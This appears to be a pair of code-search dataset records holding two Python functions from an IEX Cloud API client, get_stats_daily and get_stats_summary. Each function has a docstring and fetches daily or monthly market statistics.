def get_stats_daily(start=None, end=None, last=None, **kwargs): """ Stats Historical Daily This call will return daily stats for a given month or day. .. warning:: This endpoint is marked as "in development" by the provider. Reference: https://iexcloud.io/docs/api/#stats-historical-daily-in-dev Data Weighting: ``Free`` Parameters ---------- start: datetime.datetime, default None, optional Start of data retrieval period end: datetime.datetime, default None, optional End of data retrieval period last: int, default None, optional Used in place of date range to retrieve previous number of trading days (up to 90) kwargs: Additional Request Parameters (see base class) """ start, end = _sanitize_dates(start, end) return DailySummaryReader(start=start, end=end, last=last, **kwargs).fetch()
python
{ "resource": "" }
q29799
get_stats_summary
train
def get_stats_summary(start=None, end=None, **kwargs): """ Stats Historical Summary Reference: https://iexcloud.io/docs/api/#stats-historical-summary Data Weighting: ``Free`` Parameters ---------- start: datetime.datetime, default None, optional Start of data retrieval period end: datetime.datetime, default None, optional End of data retrieval period kwargs: Additional Request Parameters (see base class) """ return MonthlySummaryReader(start=start, end=end, **kwargs).fetch()
python
{ "resource": "" }